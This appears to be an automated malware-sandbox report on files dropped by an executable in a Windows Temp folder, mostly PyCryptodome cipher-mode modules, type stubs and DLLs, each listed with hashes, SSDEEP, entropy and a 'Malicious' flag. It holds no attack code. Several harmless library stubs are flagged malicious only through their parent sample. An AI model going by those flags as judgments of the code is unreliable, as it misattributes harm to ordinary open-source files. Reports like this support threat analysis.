                                                                                                                                            Preview:...........e..........................~.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z.d...Z.d...Z.d.Z.d.Z...e.d.d...............Z.d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..c_uintz"Cryptodome.Cipher._raw_eksblowfishaa.... int EKSBlowfish_start_operation(const uint8_t key[],. size_t key_len,. const uint8_t salt[16],. size_t salt_len,. unsigned cost,. unsigned invert,. void **pResult);. int EKSBlowfish_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int EKSBlowfish_decrypt(const void *state,.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):285
                                                                                                                                            Entropy (8bit):4.915960101562323
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBNHKkHb/Vfw1ggHzrIY3MTDyo5Alm0Wgw0Tm6sRy/6WXHg:1REYBQkHzlbgHvIY3YyogmvNZRy/O
                                                                                                                                            MD5:0417C72442B8EC2EF4EF4C6A768824D2
                                                                                                                                            SHA1:64400FA2D484328EAA347A10CF101504D7552CAB
                                                                                                                                            SHA-256:F2130E49C75B0660FCFD28D505BEF95FA392CBC2EF636717F49F855546440706
                                                                                                                                            SHA-512:65B16EB4AADB97C2B6EB52E6DB997AFAAFB4BC16B99DED9BC6956D30BD4373B0EDE496E2C97D63D5DCA6FA53261B446B179D33EED7C2F0AA5D94BC5FE13F2654
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Iterable....from Cryptodome.Cipher._mode_ecb import EcbMode....MODE_ECB: int....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: int,...salt: Buffer,...cost: int) -> EcbMode: .......block_size: int..key_size: Iterable[int]..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13312
                                                                                                                                            Entropy (8bit):4.968532257508093
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JF3rugNlF/1Nt5aSd4+1ijg0NLfFNJSCqsstXHTeH5ht47qMbxbfDq4wYH/kcX6G:tF/1nb2mhQtkXHTeZ87VDqyMcqgYvEp
                                                                                                                                            MD5:14A20ED2868F5B3D7DCFEF9363CB1F32
                                                                                                                                            SHA1:C1F2EF94439F42AA39DCDE1075DEFAC8A6029DC6
                                                                                                                                            SHA-256:A072631CD1757D5147B5E403D6A96EF94217568D1DC1AE5C67A1892FBF61409E
                                                                                                                                            SHA-512:33BE8B3733380C3ADFE5D2844819C754FB11FCBC7AA75DA8FBB4D6CEF938E7D3267FBD215B9666DCFA5795D54484360A61DAF193BC75B57C252D44E5F9F0D855
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2617
                                                                                                                                            Entropy (8bit):5.449062714374059
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:QIzLMJALqGlllJ9XSBRn1s42Wh9CW50lJ0t17:pzCALqyllJ9Xm1NGJ0L7
                                                                                                                                            MD5:2FF47BC8CBA3868516072C5C38B3A7A2
                                                                                                                                            SHA1:A0EBA656C85BBA550BE43DE5CD2C7EEF28A358E2
                                                                                                                                            SHA-256:0F870D7559929F685F23677AA1A64A69450457A624874267D5F8AA165DCBF6BD
                                                                                                                                            SHA-512:22AFE9E991BE23A4617EC5F0CF59B5128B55810C4DBC648A9870A4DE85D35D5F0C45BA1348F430140146088BF21A71C13000DAE8ABEF90D107822678711AF3E5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.e.e.e.e.d...Z.e.e.e.e.d...Z.d...Z.d.S.)......N)..._create_ecb_cipher)..._create_cbc_cipher)..._create_cfb_cipher)..._create_ofb_cipher)..._create_ctr_cipher)..._create_openpgp_cipher)..._create_ccm_cipher)..._create_eax_cipher)..._create_siv_cipher)..._create_gcm_cipher)..._create_ocb_cipher)....................................).....................c..................... .....|.|.d.<...t...........t.........................}.|.......................d.d...............r.|.......................t...........................|.|.v.r.t...........d.................|.r.|.d.v.r.t...........|...............d.k.....r.t...........d.................|.d...........|.d.<...np|.d.v.r.t...........|...............d.k.....r.t...........d.................|.d...........|.d.<...n>|.d.k.....r#t...........|...............d.k
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13824
                                                                                                                                            Entropy (8bit):5.061520684813544
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:cdF/1nb2mhQtkXn0t/WS60YYDEbqvdvGyv9lkVcqgYvEMo:e2f6XSZ6XYD5vdvGyv9MgYvEMo
                                                                                                                                            MD5:E2AB7EECFD020CFDEBA6DD3ADD732EB7
                                                                                                                                            SHA1:26975087F7AC8001830CAD4151003DBCABF82126
                                                                                                                                            SHA-256:85BCF0FD811ADE1396E3A93EEEF6BC6B88D5555498BA09C164FAA3092DACDEFF
                                                                                                                                            SHA-512:EB45126A07128E0FA8DC2B687F833BA95BB8703D7BC06E5C34F828EAEF062CFCA56D8A51A73B20DFA771595F6C6D830B659B5C0EB62467C61E95C97C4A73398D
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10530
                                                                                                                                            Entropy (8bit):5.311165184174329
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:p226kvJbQ9XIgEggPI4nx3ZJpSSaCWiHgVt834mGvWcsQAn9rdLt83425pKIn+1g:p3bJsgPI4x3ZzWdU4c7U4QnKej+gpp
                                                                                                                                            MD5:FE487E95713F6F85859B0042A8C72945
                                                                                                                                            SHA1:0BE08041C4EA5E0E70C460E102EFDADA0CB83AA1
                                                                                                                                            SHA-256:6A11B6C893D507FDE9AEB777640F9E97CEF383188AC5B164314433B649132A50
                                                                                                                                            SHA-512:F38D6098BCB60B01FFD6844412C4176B9B10F8A6ECBC5591A884A09DBD8733DD8C7061C65FA61CC975A92B80FEEDDFAA69F914D2B5760465EA19DCD3A0BA157F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.+.............................d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z'.Ciphertext Block Chaining (CBC) mode....CbcMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Cryptodome.Cipher._raw_cbca..... int CBC_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int CBC_encrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CBC_decrypt(void *cbcState,. const uint8_t *in,. uint
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):716
                                                                                                                                            Entropy (8bit):4.751012185181633
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1k1Jal9lvIY3FDHiIRyE1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REPZjT35istAY4nRNne3yFnR3Fne38
                                                                                                                                            MD5:374718D8A7601AFF8E74B7B67F517B38
                                                                                                                                            SHA1:BF6DDE08FEABEA4908869E1790DF38DDAB69CADF
                                                                                                                                            SHA-256:32C4737F3237691DAC8534EA506CD139E17FA709139B07A3CDF3513EBC850DCC
                                                                                                                                            SHA-512:9966959122F804F46CD4A594AB3F6D54B103236AB15BF80D97C63B30AA02CD0E5E2E46ACC9B38B85237CA0E6147020C93A66C069401FA47087BFB29EFE3EB82B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CbcMode']....class CbcMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.... def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25908
                                                                                                                                            Entropy (8bit):5.35972377883601
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:Pq/qgU1Xl1wB3ziI4SiI4QuogPD8jLmv4SeWPj7KzPc4eqEu:P5/wJDEI4VPWmvxeG7KYW
                                                                                                                                            MD5:5FCA2BC88DA691D438A5075645D4663E
                                                                                                                                            SHA1:2BD464D92954C7F7F86E48317CBB7BE743A7B5C3
                                                                                                                                            SHA-256:FF96C3125D0A1F1A7E9EBA6D9B2884B0C3C50C256579037DBD72D507EBD4A17A
                                                                                                                                            SHA-512:B2FA9DD1782B6D87B62279891E697CD937AE14E262B38393EC54C7A6A3282DD40779363A5C7FD27679DB58BE9A9F51EAA9415DD35E9F1B04E90C01593C24494D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.a.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...e.d.d.d.................Z...G.d...d.e...............Z.d...Z.d.S.).z".Counter with CBC-MAC (CCM) mode....CcmMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_writeable_buffer)...strxor)...long_to_bytes)...BLAKE2s)...get_random_bytesc.....................$.....t...........d.d.|...............S.).N..Enum..)...type)...enumss.... .oC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Cryptodome\Cipher\_mode_ccm.py..enumr....3...s..............E.."..".."...............)...NOT_STARTED..PROCESSING_AUTH_DATA..PROCESSING_PLAINTEXTc.....................p.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.S.).r....a....Counter with CBC-MAC (CCM)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provide
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1647
                                                                                                                                            Entropy (8bit):4.397477650476907
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7CnbKT3fAbSUA9UUOHMnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cuuvUXUO8vesLeJLn8nlEF49
                                                                                                                                            MD5:91133F991531450E28EE3F680FBF6F20
                                                                                                                                            SHA1:BB3761FBD4A0F912A77258D73B30D7E43403130E
                                                                                                                                            SHA-256:5F0058DE990A9668E5B0CE2273E74E0D5BFDF79F5E6745DC9B8FAEB39822A9AD
                                                                                                                                            SHA-512:F5FAF2155B4D172D3DDAF556DF2EF28E5CE93CE81F471AED1D7215C658EF03C9DAB71FA3BDABD3133951A1A64EA628587F8390D330280518B2CA60F0E6451D74
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, overload, Dict, Tuple, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CcmMode']....class CcmMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. msg_len: int,.. assoc_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> CcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str:
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10944
                                                                                                                                            Entropy (8bit):5.294742956505828
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:yw3jDCxEZ8orrU4B/NU4DfZZkZZZZqjbPpw:LrZ8oXTBFTDnjtw
                                                                                                                                            MD5:857F80FF46670CBEC96E079A54F0FE94
                                                                                                                                            SHA1:AD125DA210657A85A179AFD14C9A69207645E829
                                                                                                                                            SHA-256:4312845E4F3CAB6ED9BEB0626C02D2E268A6B9930BAA9707B70478303463074E
                                                                                                                                            SHA-512:566565043C2084695EFA50457831209A12F711F8AE4D1DA0D655259926037B46AC378DDB6C8F6B61FA4DB55258BC03EB1D2EF7DD0BCB17358BF51610CB9D918E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.+.............................d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z..Counter Feedback (CFB) mode....CfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Cryptodome.Cipher._raw_cfba .... int CFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. size_t segment_len, /* In bytes */. void **pResult);. int CFB_encrypt(void *cfbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CFB_decry
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):757
                                                                                                                                            Entropy (8bit):4.692214100146291
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1k1Jal9lvIY3FDDHo2YRyU1AOlsQRZFq6R5pFq6jI33ynFq6R5xnFq6jIF:1REPZjT3lGNAYsEHnRNne3yFnR3Fne3l
                                                                                                                                            MD5:C277ABB0D41936FA2B2C6C5A7555C9B2
                                                                                                                                            SHA1:87B8E4314BBB63E156CB1E2DB3BBE318B7B13803
                                                                                                                                            SHA-256:15EE428028300FCB807AF557DB278F229C260EC98E8AE1971661B436CFE5C2A9
                                                                                                                                            SHA-512:1D2BF9AE0D89776EE0D2622A520C6FA0590C5B900419502F55679AEEEF2D53DF468894DB87867AD9596E79D6E4CB04D3CCCA3F31B25D62CEB4222B92DBC544F1
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CfbMode']......class CfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer,.. segment_size: int) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15615
                                                                                                                                            Entropy (8bit):5.333812078327485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/HtGDPkH7KxiM16TsyUiFfU4PkdU4fYrLEj4SkIkjaXfAhS1LbM:fwb0SDb2fTPkdTfYrLPSkI+aX31M
                                                                                                                                            MD5:876FF17F002101A50E59F5BFE592E57C
                                                                                                                                            SHA1:E01BFD3A213AC1D884AAABDF9DC6775FA8D85417
                                                                                                                                            SHA-256:C1FE74230101906AD6A24E01913E2706FF325A7BFBD6D333505983672FF509E3
                                                                                                                                            SHA-512:7F5048A69F0DA1E45D1696F7D42549EB7B9296EA13F9A3CC869B9A37B5B9C0296B21D65C6B2861F138680821452718D47A07A962A914D1020278EB0D2F10475F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eu?.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z..Counter (CTR) mode....CtrMode.....N)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytes)..._copy_bytes..is_native_int)...long_to_bytesz.Cryptodome.Cipher._raw_ctra..... int CTR_start_operation(void *cipher,. uint8_t initialCounterBlock[],. size_t initialCounterBlock_len,. size_t prefix_len,. unsigned counter_len,. unsigned littleEndian,. void **pResult);. int CTR_encrypt(void
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):831
                                                                                                                                            Entropy (8bit):4.595725224881154
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REPZjT3Q6fUAY4AVjjnRNne3yFnR3Fne38:YVLcZVjTvesLeM
                                                                                                                                            MD5:22DC24EE5319AB0ACF3D1AEFEE2854C5
                                                                                                                                            SHA1:91E1F26CE9FDA76A71AC3D761AAD3DFA1BA64996
                                                                                                                                            SHA-256:AB8697E3CDA28729D9CB6A6545EA1E3FCDC184C9E07BFB70D9FAEE38F27012EF
                                                                                                                                            SHA-512:3E4DAC2C8C87A11C783DAAC9F678B2A50220857636BDB7A9B1D23DF9F8421A9DC8BF63CF6FB6BD1EB4561615E712F19EC932180D0BC398F7AB7F2E5CD62BD32F
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CtrMode']....class CtrMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. block_cipher: SmartPointer,.. initial_counter_block: Buffer,.. prefix_len: int,.. counter_len: int,.. little_endian: bool) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16164
                                                                                                                                            Entropy (8bit):5.348455166474443
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:AwX+X6qFM4jDTFVyfTHMR/A7Ip47ai99kGzecWRK:AjX6vwloIJu7amHzeRK
                                                                                                                                            MD5:C8748305FF48DA4075654AF9FBEF4075
                                                                                                                                            SHA1:86FF755CBF54FE7C7C2B398D11A99B0940F06E20
                                                                                                                                            SHA-256:117A3D461E180020A3D4BCE5C7250E5C0B9A24B31F5000C9806167FB989AC41F
                                                                                                                                            SHA-512:D0018394341BFB633B6C9D7AB151DD987E01F33BBEEC3CA2B4AAC247DB5BD4609D9F05BB0571CE4F061DE230EE31C632959512078D58A1EB9F1794263F5F0A45
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e-:.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d.S.).z..EAX mode....EaxMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_buffer)...strxor)...long_to_bytes..bytes_to_long)...CMAC..BLAKE2s)...get_random_bytesc.....................V.....e.Z.d.Z.d.Z.d...Z.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.S.).r....a....*EAX* mode... This is an Authenticated Encryption with Associated Data. (`AEAD`_) mode. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed,. and it will still be subject to authentication... The decryption step tells the receiver if the message comes. from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message -. including the header - has been modified or corrupted.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1590
                                                                                                                                            Entropy (8bit):4.436811038410909
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7C/DsT3VEA9UbnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:c+AGXrvesLeJLn8nlEF49
                                                                                                                                            MD5:B414CB43B46387AD1B1B2AD15F66314E
                                                                                                                                            SHA1:DE8BFF4EE379D1F4A7DF3EC4051A3CB1D3DCB09E
                                                                                                                                            SHA-256:C5246506D2FF0E2B13BAE3A5D47467C47994932C24499FEFCF32126C39BF9611
                                                                                                                                            SHA-512:0788A2CF03A23CD2788A592E5C201F2632CABEF44B9094158A7B5A02B0AB97202C05562FD78F585554E7A4FEA2C862B885F3E5074792080285787F112CCB5F22
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Any, Union, Tuple, Dict, overload, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['EaxMode']....class EaxMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> EaxMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> No
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8206
                                                                                                                                            Entropy (8bit):5.266936476305002
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JQRS6kvViAtXEshfxCx7l7amadVgrPqBP6sQLR7DHdMwqc5p3hxhS6ZJi3Xq:Jdipsh279aGv9XhfJg6
                                                                                                                                            MD5:C29D092D39A83A2C5E9A689B351E9C26
                                                                                                                                            SHA1:06A6A83038B3A9893B436E5D97B3C0B1F37A37AA
                                                                                                                                            SHA-256:DBF80AF47BA92D1C3942F842F711F967B5A33AF45FDE3BB1C9B667B11634C01C
                                                                                                                                            SHA-512:DB98E6B3E1D406077217F10EDBD20CF92C49242987A027108A4822A44D220641E63A63FBF7D38C1D6DB1A6CDB9A43893A426708B713D37270164293042D2D5E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e]!........................r.....d.Z.d.g.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z".Electronic Code Book (ECB) mode....EcbMode.....)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_bufferz.Cryptodome.Cipher._raw_ecbak.... int ECB_start_operation(void *cipher,. void **pResult);. int ECB_encrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_decrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_stop_operation(void *state);. c.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):615
                                                                                                                                            Entropy (8bit):4.8565980350251685
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1k1Jal9lvIY3FDlD1AZlUFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REPZjT3PJAbCnRNne3yFnR3Fne38
                                                                                                                                            MD5:125B8830D549BBC165F15871922DE5E5
                                                                                                                                            SHA1:183D164CB3135E0DD3A27F91D20EB39DD01B2B64
                                                                                                                                            SHA-256:8A8A5ED79EFAFC9CB7A3AD95BAE1ABCAA4E447776760778E91FDD6E510714352
                                                                                                                                            SHA-512:F7B871B62D73B4AE40E3FD6FD65C8078F10464D9976E9760CC7B34541A1DFF43548DA0B31B47BA5A55C50033B0D5DE6D3549C594E2792D036907949CA6DF0C5B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = [ 'EcbMode' ]....class EcbMode(object):.. def __init__(self, block_cipher: SmartPointer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24807
                                                                                                                                            Entropy (8bit):5.415128285248984
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:2SaWw4SgqFGRVwkJRkPM4SjL8Tn4klTfZkgMybU7BS7ocYyb67meJh9:2Ow4SgqMOU9L+9OgMybUE7x/Kz
                                                                                                                                            MD5:9C7BC3803B4675635C2B798CEDFD8B1E
                                                                                                                                            SHA1:C4151FA068D91BA136834EA74FCAECF00408D39D
                                                                                                                                            SHA-256:E202E22A6F4B506CFA7746DC997203816FEB9199837EEFAC1189CD756A25C50C
                                                                                                                                            SHA-512:88A3A3BB9446599627806E4D7D6B22B4D493C8993DD45DBF3850E0C2080ABE6603D034D6F22CB5B91575B3670642ABF6E7D4D225EBE3C97342762DAF00CA8F33
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.U........................,.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d...Z.d...Z...e...............Z.d...Z...e...............Z...G.d...d.e...............Z d...Z!..e!d.d.................Z"..G.d...d.e...............Z#d...Z$d.S.).z..Galois/Counter Mode (GCM)....GcmMode.....)...unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)...BLAKE2s)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_featuresa`.... int ghash_%imp%(uint8_t y_out[16],. const uint8_t block_data[],. size_t len,. const uint8_t y_in[16],. const void *exp_key);. int ghash_expand_%imp%(const uint8_t h[16],. void **ghash_tables);. int ghash_destroy_%imp%(void *ghash_tables);.c..........
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1586
                                                                                                                                            Entropy (8bit):4.431900531457141
                                                                                                                                            Encrypted:false
